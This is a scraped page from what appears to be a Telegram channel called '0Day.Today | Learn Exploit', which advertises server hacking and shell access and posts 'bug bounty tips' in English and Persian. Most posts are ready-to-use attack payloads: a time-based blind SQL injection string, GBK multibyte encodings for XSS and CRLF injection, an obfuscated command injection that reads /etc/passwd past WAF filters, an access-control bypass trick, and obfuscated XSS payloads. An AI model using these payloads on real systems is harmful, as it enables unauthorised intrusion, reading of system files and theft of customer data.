0Day.Today | Learn Exploit | Zero World | Dark web |
19.1K subscribers
1.23K photos
125 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

We have added some adjustments to the payload that may bypass some WAFs & to help you with the hunt!

twitter

#BugBountyTips
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
2FA bypass

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍7
Bug Bounty Hint

GBK Encoding / MultiByte Attack

嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")

For XSS, CRLF, WAF bypass

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3👎2
Filter bypass with regex for OS injection commonly (/"'&amp;|()-;:.,`) block by WAF


E.g.: reading /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
🤔4👍2
Bypass endpoint restrictions

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
[+] FIlter bypass techniques:

Sometimes you can do amazing things just by appending /? to bypass access control restrictions

POC:
https://targetdomain/api/endpoint <-- Access Denied

https://targetdomain/api/endpoint/? <--- Access to entire customer database

#AEMSecurity #FilterBypass #bugbountytips

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
84👍1🔥1
Xss Payload for bypass the regex filter with Obfuscate the alert value :

پیلود XSS برای دور زدن Regex Filter با Obfuscate کردن مقدار Alert:

<img src="X" onerror=top[8680439..toString(30)](1337)>

<script>top[8680439..toString(30)](1337)</script>


#bugbountyTips #xss
〰️〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍2